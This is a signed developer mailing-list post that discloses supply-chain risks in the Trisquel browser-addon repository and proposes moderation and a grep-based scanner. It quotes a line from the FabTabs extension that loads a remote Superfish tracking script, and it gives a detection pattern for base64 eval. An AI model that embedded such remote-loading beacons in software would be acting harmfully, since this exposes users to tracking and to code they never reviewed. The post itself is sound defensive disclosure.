-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, I have noticed that the Trisquel aBrowser addon repository is susceptible to several threat vectors.
1) Random users signing up and changing the download location of .xpi files. This could be used to inject malicious code to unknowing users. Solution: a) Assign moderators who will check addons for approval similar to AMO before going live. b) Whitelist certain domains, e.g. only allow the url to contains download links from "https://addons.mozilla.org"; since they are generally being checked by others. 2) Non-free blobs can still exists in supposedly free code and must be reviewed. Taking for example a recent finding in FabTabs: https://trisquel.info/en/browser/addons/fabtabs While manually inspecting the code I found this interesting line located in "/chrome/content/fabtab/content.js": script.src = 'http://www.superfish.com/ws/sf_main.jsp?dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=fabtab'; This code appears to be a web-beacon and directly links to non-free code outside of the original xpi! Thankfully this outside code appears only to have analytic/tracking built in and not actual malicious intent other than ensuring HTTPS is OFF whenever it queries the beacon (contains url rewrites). However this opens the door for much larger problems. Someone should be proactively studying extensions prior to upload, and/or implement a small filter which can catch certain artifacts at minimum. One such make-shift bash script I whipped up (could use some work): unzip -p *.xpi | cat | grep "http://\|https://\|eval(base64_decode" This outputs all links and any base64 found inside of an xpi to the terminal, and can catch the superfish web beacon. Just some thoughts. :) -----BEGIN PGP SIGNATURE----- iQEcBAEBAgAGBQJSm3ckAAoJEJ6DCuZ5py6j7SYIAJPuos8kCPjEG+k2LuSp+dlK UCwUcfKHCU74bMBkPRHxHbBc6p1fgutrnwAn7M+iFPL7B7nAKeMFL3Q2TW8tHO3p TGUFyTsDPsapogNVzjVO5Yt5rVkIa2C9TEQkVrjATTLkvF+dUPoCju8hZ2LVpMiG yikda/JqYUtzN/MUWDAGkSq/Ldu9/kcTOk5iNcqOGlF/V7ZHPkQFOyrtZ7kSFJi6 Q4cr1E1BBekMptRNAnNIIaCC1hXX8I/MBK2WKsZS3PpGCyEySaZcmbaWGY3nvO9k mwg+2Nz3cZcdciURDDn5Rlhk8dWzXZqu83WtsN2e9MfU9YsYDKEVPX1ZiqWWcTM= =V9fF -----END PGP SIGNATURE----- _______________________________________________ Trisquel-devel mailing list [email protected] http://listas.trisquel.info/mailman/listinfo/trisquel-devel
